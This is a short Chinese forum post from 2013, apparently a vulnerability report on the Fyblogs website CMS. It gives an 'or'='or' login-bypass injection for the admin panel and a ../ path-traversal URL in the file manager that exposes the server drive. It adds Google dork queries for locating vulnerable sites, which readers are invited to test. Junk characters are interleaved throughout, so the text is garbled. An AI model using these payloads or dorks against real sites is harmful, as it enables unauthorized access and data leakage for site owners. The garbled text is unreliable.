漏洞类型: 未授权访问/权限绕过
5 d/ x- V" K$ j- `& ^$ l% F# `' a9 d2 ^3 o0 P6 g% |3 f8 F6 X- G
简要描述:
: w5 C% s2 [$ i+ n* n. I) i$ M1 i& y6 }# S1 m% t
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ D" x+ Q! o6 \ P
+ [) b1 F* a5 S( O% ], g详细说明:
3 Q: Y H7 P7 P6 H1 N. x f$ W* ~! J! w/ Y
后台万能密码 'or'='or'- z1 c- c# v2 _1 o) Y, w- r$ ^
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
C# q i4 D- B% xadmin/uploadfile.asp?currentFolder=/upfiles/../0 q0 K2 O' D6 {1 x, v
; v. A% ?. O' R, h/ q- F/ n( w( o
漏洞证明:* g- e- L( U( |# J" c( |
; l9 w& q& W7 ? s5 H( ^& c# g* Z
谷歌:inurl:type.asp?id=1 新闻中心' V- d# _( l7 S) m, C& n* y, ^
或者 :inurl:download_ok.asp?( M: n9 t4 T# @3 v+ O9 S
~/ g/ q: n' W; e可以测试: v: X0 o! i @6 g& h% R
9 o) X. L; ]7 s& S4 a- s) I
" G! E3 Q! H# B" E0 Y7 p
|
发表于 2013-3-7 13:07:46
收藏
支持
反对